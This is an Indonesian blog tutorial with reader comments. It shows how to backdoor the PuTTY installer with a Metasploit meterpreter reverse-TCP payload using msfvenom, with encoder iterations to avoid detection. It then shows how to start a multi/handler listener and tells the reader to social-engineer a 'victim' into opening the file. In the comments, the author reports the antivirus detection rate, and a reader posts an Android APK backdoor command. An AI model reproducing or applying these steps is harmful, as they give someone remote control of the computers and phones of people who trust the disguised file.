Menu

iklan atas

» » Cara Backdoor-ing Dengan Excutable File [[Metasploit | msfvenom]]


Seperti judul, sekarang kita akan melakukan penetrasi menggunakan excutable file alias file yang di eksekusi oleh si "victim" alias target yang menggunakan windows. Yaitu, dengan menggunakan Metasploit Exploitation Framework's plugin yaitu:  Msfvenom... =))

Untuk Konesksi Local/LAN:

Penjelasan awal:

IP saya sebagai penyerang: 192.168.0.72
IP target: 192.168.0.XX

Kita Mulai!
  
Ikuti saya, dengan membuka terminal dan ketikkan:
wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe
 mengapa putty? yah, karena ini yang kita gunakan sebagai media yang akan kita injeksi dengan backdoor dari Metasploit.

Sekarang, saya anggap anda berada dalam directory root yaah :)) jadi, sekarang kita injeksi aja langsung putty.exe nya dengan perintah ini:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.72 LPORT=4444 > puttyi.exe
Saya jelaskan lagi bahwa 192.168.0.72 adalah IP kita, dan Port yang ingin kita gunakan adalah 4444.
Dan, puttyi.exe adalah nama file yang telah kita injeksi dengan Backdoor.

Sekarang, kita jalankan  metasploit kita.
msfconsole
Sekarang kita mulai reverse handler untuk mendapatkan reverse connection.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.72
set LPORT 4444
exploit
  
Sekarang, tugas kita adalah share puttyi.exe ke komputer target, dan kita suruh target membuka-nya. Disini mungkin anda akan diuji soal kemampuan Social Engineering nya alias Soceng-nya. :))

Dan pada saat target membukanya, maka anda akan langsung konek alias berada dalam komputer target. Dan anda bisa berjoget ria seperti penonton YKS :)) Tapi tolong jangan menggunakan topen Guy Fawkes ya... =)) hahahaha....

Untuk target yang tidak berada dalam local area, alias menggunakan jaringan Internet. Maka itu nanti saja ya, saya juga masih belajar. Hehehe.

Terimakasih untuk : exploiterz

./Pendiam
Posted by
Labels:
at 05:59

8 comments:

Unknown said... 9 November 2013 at 19:26

apakah backdoor ini tidak di kenali sebagai virus oleh antivirus ?

Pendiam said... 11 November 2013 at 22:18

Belum tau saya pak.
Nanti akan saya coba menggunakan virus total untuk mengecheck.

Pendiam said... 14 November 2013 at 21:39

https://www.virustotal.com/en/file/5006864c7e0066d3923c0c4a90c6e8e0d176edcdaa2044177bc251baad7b9eda/analysis/1384390277/

di Klik bro. terdeteksi sebagai virus 5 antivirus.

Admin said... 30 August 2015 at 12:32

keren gan, tapi ko file nya gbsa diinstall di windowsnya ya >?
klo di android gmna ?

ane pake perintah ini ga bsa diinstall juga di hpnya , dan gbsa exploit :(

msfvenom -p android/meterpreter/reverse_tcp lhost=xxx.xxx.xx.xxx lport=443 R > mainactivity.apk

Pendiam said... 8 June 2016 at 21:43

@Sarfazi:

Seharusnya sih bisa gan. Karena ditempat ane juga bisa koq. Atatu mungkin versi android menentukan work atau tidaknya kali yak.

Riky said... 25 May 2017 at 13:56

Ane masi newbe gan, kl biar bisa masuk direcktori root gmana y..

Riky said... 25 May 2017 at 13:56

Ane masi newbe gan, kl biar bisa masuk direcktori root gmana y..

Pendiam said... 18 July 2017 at 01:21

@Ricky Sadhega:

Kalau masuk directory root mah gampang gan. Sering mainin comment kan? tinggal CD Lompat directory ke /root.

Post a Comment

Subscribe to: Post Comments (Atom)
 
Top